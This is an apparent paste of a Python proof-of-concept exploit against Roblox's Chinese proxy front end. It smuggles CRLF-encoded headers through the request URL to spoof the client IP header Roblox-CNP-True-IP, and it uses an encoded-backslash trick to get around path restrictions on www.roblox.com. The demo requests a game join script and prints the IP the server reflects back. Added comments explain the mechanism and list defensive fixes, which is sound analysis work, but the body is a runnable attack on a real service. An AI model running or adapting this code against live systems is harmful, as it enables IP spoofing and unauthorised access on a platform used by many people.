XxMirayxX21

Roblox IP spoof

May 25th, 2021
  1. # h0nda
  2. # 2021-04-11
  3.  
  4. from http.client import HTTPResponse
  5. from urllib.parse import urlsplit, unquote, quote
  6. import socket
  7. import ssl
  8. import requests
  9. import json
  10.  
# Import-time side effect: asks the third-party service api.ipify.org for this
# machine's public address. The value is only interpolated into the `overhead`
# string inside spoof_request(), so it feeds a length calculation and is never
# written to the socket by this script.
REAL_IP = requests.get("https://api.ipify.org?format=json").json()["ip"]
  12.  
def spoof_request(method, url, headers=None, data=None, ip=None):
    """Send one hand-built HTTPS request whose request target embeds a header block.

    Proof of concept for CRLF (header) injection through a front-end proxy.
    The text built in ``payload`` is percent-encoded and appended to the
    request target, so the bytes written to the socket form a well-formed
    request line. The script's own model of the proxy (``overhead`` below)
    assumes the proxy copies the *decoded* target into a ``Roblox-CNP-Url``
    header without re-encoding it; under that assumption the CR/LF pairs in
    the payload would become real header boundaries on the proxy-to-backend
    hop.

    Args:
        method: HTTP method placed in the request line.
        url: Target URL; only hostname, path and query are used. Every
            ``roblox.com`` in the hostname is replaced by ``roblox.qq.com``
            for the TCP/TLS connection and the outer ``Host`` header.
        headers: Optional mapping of extra header lines appended to the
            embedded block.
        data: Optional string appended after the embedded block's blank line.
        ip: Value written into the embedded ``Roblox-CNP-True-IP`` header.
            With the default ``None`` the literal text ``None`` is written.

    Returns:
        An ``http.client.HTTPResponse`` on which ``begin()`` has already been
        called (status line and headers parsed, body not yet read). The TLS
        socket is not closed here.

    NOTE(review), defensive takeaways suggested by this code, to be confirmed
    against the real deployment:
      * A proxy that copies a decoded request target into an upstream header
        must reject or re-encode CR and LF first.
      * A backend should accept a client-address header only from the
        trusted hop and treat duplicate or conflicting copies as an error.
      * Encoded CR/LF (``%0D%0A``) or encoded backslashes (``%5C``) in a
        request target are worth alerting on in edge logs.
    """
    purl = urlsplit(url)
    # Rebuild "path?query"; scheme, port and fragment of `url` are ignored.
    path = purl.path + ("?" + purl.query if purl.query else "")

    # bypass path restrictions on www.roblox.com
    # (author's claim) Every "/" becomes an encoded backslash and the result
    # is prefixed with "/login%5C..". Presumably a component behind the edge
    # treats "\" as a path separator while the edge's path filter does not:
    # TODO confirm; SOURCE does not show either component.
    if purl.hostname == "www.roblox.com":
        path = "/login%5C.." + path.replace("/", "%5C")
   
    # Connect to the roblox.qq.com counterpart of the host on 443. The default
    # SSL context keeps certificate and hostname verification enabled.
    conn = socket.create_connection((purl.hostname.replace("roblox.com", "roblox.qq.com"), 443))
    context = ssl.create_default_context()
    conn = context.wrap_socket(conn, server_hostname=purl.hostname.replace("roblox.com", "roblox.qq.com"))

    # payload that'll "override" the request
    # Starts with " HTTP/1.1\r\n" so that, once appended to a URL and decoded,
    # it reads as the end of a request line followed by header lines. "*" is a
    # placeholder for the Content-Length value filled in further down.
    payload = ""
    payload += " HTTP/1.1\r\n"
    payload += "Host: %s\r\n" % purl.hostname
    payload += "Content-Length: *\r\n"
    # Caller-chosen client address: the header a backend would have to trust
    # for the spoof to have any effect.
    payload += "Roblox-CNP-True-IP: %s\r\n" % ip
    if headers:
        for key, value in headers.items():
            payload += "%s: %s\r\n" % (key, value)
    payload += "\r\n"
    if data:
        payload += data

    # calculate the content-length overhead
    # (the actual content of this doesn't matter, only the length)
    # `overhead` is never sent. It is the author's reconstruction of the text
    # the proxy is believed to emit upstream; the date, signature and timing
    # values below are fixed samples used only for their length.
    overhead = ""
    overhead += " HTTP/1.1\r\n"
    overhead += "Connection: keep-alive\r\n"
    overhead += "Host: %s\r\n" % purl.hostname.lower().replace("roblox.com", "roblox.qq.com", 1)
    overhead += "Roblox-Domain: cn\r\n"
    overhead += "Roblox-CNP-Date: 2021-03-06T20:41:52 08:00\r\n"
    overhead += "Roblox-CNP-Secure: cnGgYV/BzUMyhjw3iIiKi0TD6Q0=\r\n"
    overhead += "Roblox-CNP-True-IP: %s\r\n" % REAL_IP
    # funnily enough, this header is also left unencoded
    # The decoded path and the raw payload are interpolated here, mirroring
    # the assumption that the proxy writes the decoded URL into this header.
    overhead += "Roblox-CNP-Url: http://%s%s%s\r\n" % (
        purl.hostname.lower().replace("roblox.com", "roblox.qq.com"),
        unquote(path),
        payload)
    overhead += "Content-Length: 0\r\n"
    overhead += "X-Stgw-Time: 1615034512.456\r\n"
    overhead += "X-Client-Proto: https\r\n"
    overhead += "X-Forwarded-Proto: https\r\n"
    overhead += "X-Client-Proto-Ver: HTTP/1.1\r\n"
    overhead += "X-Real-IP: %s\r\n" % REAL_IP
    overhead += "X-Forwarded-For: %s\r\n\r\n" % REAL_IP
    # Fill the "*" placeholder: first inside the model (it contains a copy of
    # the payload), then inside the payload itself using the model's length.
    overhead = overhead.replace("*", str(len(overhead)))
    payload = payload.replace("*", str(len(overhead)))

    # the "real" request that is sent
    # quote() percent-encodes the spaces and CR/LF of the payload, so what
    # goes on the wire is a single request line, an outer Host header and an
    # empty body.
    request = ""
    request += "%s %s%s HTTP/1.1\r\n" % (method, path, quote(payload))
    request += "Host: %s\r\n" % purl.hostname.replace("roblox.com", "roblox.qq.com")
    request += "Content-Length: 0\r\n"
    request += "\r\n"

    conn.send(request.encode("UTF-8"))

    # Parse status line and headers now; the caller reads the body.
    resp = HTTPResponse(conn)
    resp.begin()
    return resp
  75.  
if __name__ == "__main__":
    # Demonstration run: request the join script with a loopback address as
    # the claimed client IP, then print the ClientIpAddress field that the
    # response body echoes back. Seeing the supplied value there instead of
    # the caller's real address would indicate that the backend trusted the
    # injected header.
    response = spoof_request(
        method="GET",
        url="https://www.roblox.com/game/join.ashx",
        ip="127.0.0.1"
    )
    data = response.read().decode("UTF-8")
    # Plain string splitting, not JSON parsing: raises IndexError when the
    # body does not contain "ClientIpAddress".
    print("Reflected ip: %s" % data.split("ClientIpAddress")[1].split(",")[0])